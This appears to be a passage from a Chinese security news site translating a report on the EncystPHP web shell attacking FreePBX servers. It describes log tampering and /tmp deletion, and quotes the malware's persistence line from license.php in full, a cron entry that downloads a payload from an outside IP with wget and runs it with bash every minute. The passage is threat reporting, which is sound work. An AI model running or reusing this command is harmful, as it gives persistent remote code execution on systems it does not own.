rm -rf /tmp/*命令删除临时文件,并通过 sed 命令篡改系统日志。研究人员发现其持久化脚本为license.php,其中包含如下核心代码行:
system("echo '*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2' | crontab -");
阅读量5142
发布时间 : 2026-02-04 11:26:44
本文是翻译文章,文章原作者 Ddos ,文章来源:securityonline
原文地址:https://securityonline.info/silent-intruder-encystphp-web-shell-burrows-into-freepbx-systems/
译文仅供参考,具体内容表达以及含义原文为准。
rm -rf /tmp/*命令删除临时文件,并通过 sed 命令篡改系统日志。研究人员发现其持久化脚本为license.php,其中包含如下核心代码行:
system("echo '*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2' | crontab -");

安全客

2026-02-04 11:28:08
2026-02-04 11:26:44
2026-02-04 11:26:03
2026-02-04 11:25:28
2026-02-04 11:24:58
2026-02-04 11:28:08
2026-02-04 11:26:03
2026-02-04 11:25:28
2026-02-04 11:24:58
2026-02-04 11:24:22
2026-02-04 11:23:54
2026-02-04 11:23:22
发表评论
您还未登录,请先登录。
登录